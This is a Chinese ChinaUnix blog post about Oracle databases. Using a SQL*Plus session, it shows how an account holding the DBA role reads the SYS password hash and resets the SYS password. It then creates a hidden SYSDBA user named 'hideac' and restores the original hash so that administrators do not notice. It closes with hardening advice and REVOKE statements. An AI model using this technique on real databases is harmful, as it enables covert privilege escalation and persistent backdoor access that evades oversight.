oracle中通过dba权限获得sysdba权限-zzjlzx-ChinaUnix博客

zzjlzxzzjlzx.blog.chinaunix.net

首页　| 　博文目录　| 　关于我

zzjlzx

博客访问： 9287721
博文数量： 1669
博客积分： 16831
博客等级：上将
技术积分： 12594
用户组：普通用户
注册时间： 2011-02-25 07:23

个人简介

柔中带刚，刚中带柔，淫荡中富含柔和，刚猛中荡漾风骚，无坚不摧，无孔不入！

文章分类

全部博文（1669）

NGINX（1）
MongoDB（2）
docker（8）
shadowsocks（1）
CloudFoundry（11）
CloudStack（102）
openstack（61）
PHP（0）
mail（0）
hadoop（25）
GemFire（1）
文件系统（4）
CDN（7）
下载及资源（15）
数据缓存（8）
web 加速（9）
分布式文件系统架（23）
虚拟化（133）
同步（6）
网站架构（50）
windows 监控（15）
mysql 监控（5）
oracle 监控（2）
linux 监控（24）
web 监控（35）
其他数据库（27）
备份恢复（28）
VPN及认证（24）
云系统（29）
windows（29）
WEB 故障（13）
mysql 备份（10）
oracle 集群（15）
HA及负载均衡（52）
存储（66）
shell（39）
web 应用（19）
mysql 优化（16）
mysql 故障（14）
mysql 安全（8）
mysql 配置（29）
mysql 应用（10）
web 安全（21）
SAN交换路由（26）
web 优化（46）
基础解释（24）
linux 安全（37）
linux 故障（22）
linux 应用（85）
linux 配置（64）
web 配置（23）
oracle 备份（33）
UNIX（12）
Solaris（5）
Aix（1）
oracle 配置（69）
oracle 优化（62）
oracle 安全（10）
oracle 应用（30）
交流（29）
oracle 故障（59）
linux 优化（31）
未分配的博文（4）

文章存档

2023年（4）

2022年（1）

2021年（10）

2020年（24）

2019年（4）

2018年（19）

2017年（66）

2016年（60）

2015年（49）

2014年（201）

2013年（221）

2012年（638）

2011年（372）

我的朋友

相关博文

oracle中通过dba权限获得sysdba权限

分类： Oracle

2011-12-01 15:43:39

oracle中通过dba权限获得sysdba权限2010-07-01 11:01在日常的数据库维护过程中，有很多朋友为了权限赋予的方便，一般都会直接赋予新建用户dba角色。dba这个角色是数据库中权限非常大的，这里我们来看看如何通过一个dba角色来获得sysdba权限。
在dba角色的权限列表中有一项：alter user权限，这个权限可以允许我们修改数据库所有用户账户信息，包括sys用户的。
>alter user sys identified by mypassword;
这样修改之后你会发现，你可以使用修改后的密码来登入sys，这样你就获得了sys的权限。有时候由于sys密码频繁修改，或者长时间不用，导致密码丢失可以用这种方法很好的解决。当然，如果觉得直接去修改原先的sys密码会很不安全，因为这会引起管理员的注意，只是需要使用之后再还回去，但又不知道原先的密码，不能通过上面的语句修改回去，这个时候，可以用alter user 的另一个语句来实现
>alter user sys identified by values 's1213asdwe';
下面是个修改过程的例子。
SQL*Plus: Release 10.1.0.3.0 - Production on Wed Jun 30 19:41:28 2010
SQL> conn
Enter user-name: justay
Enter password:
Connected.
SQL> select username,password from dba_users where username='SYS';
USERNAME PASSWORD
------------------------------ ------------------------------
SYS 4001B8AE29A7B401
SQL> alter user sys identified by oracle;
User altered.
SQL> disconn
Disconnected from Oracle Database 10g Enterprise Edition Release 10.1.0.3.0 - Production
With the Partitioning, OLAP and Data Mining options
SQL> conn
Enter user-name: sys as sysdba
Enter password:
Connected.
SQL> create user hideac identified by oracle;
User created.
SQL> grant sysdba to hideac;
Grant succeeded.
SQL> disconn
Disconnected from Oracle Database 10g Enterprise Edition Release 10.1.0.3.0 - Production
With the Partitioning, OLAP and Data Mining options
SQL> conn
Enter user-name: justay
Enter password:
Connected.
SQL> alter user sys identified by values '4001B8AE29A7B401'; --将sys用户密码还原
User altered.
从上面可以看出在拥有dba权限的情况下，新建了一个拥有sysdba权限的用户hideac。这个现象告诉我们
1.不要轻易给一个用户dba权限。
2.如果非要给dba权限，请修改sys为OS验证，并确保数据库服务器操作系统口令的安全
3.当然，也可以revoke掉dba的grant权限和alter user权限
SQL>revoke alter user from dba
SQL>revoke grant any role from dba
SQL>revoke grant any privilege from dba
SQL>revoke grant any object privilege from dba

阅读(2382) | 评论(1) | 转发(1) |

上一篇：SystemImager

下一篇：Oracle用户权限表的管理方法

给主人留下些什么吧！~~

背包包1112011-12-04 03:20:56

进来看看~

回复 | 举报

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6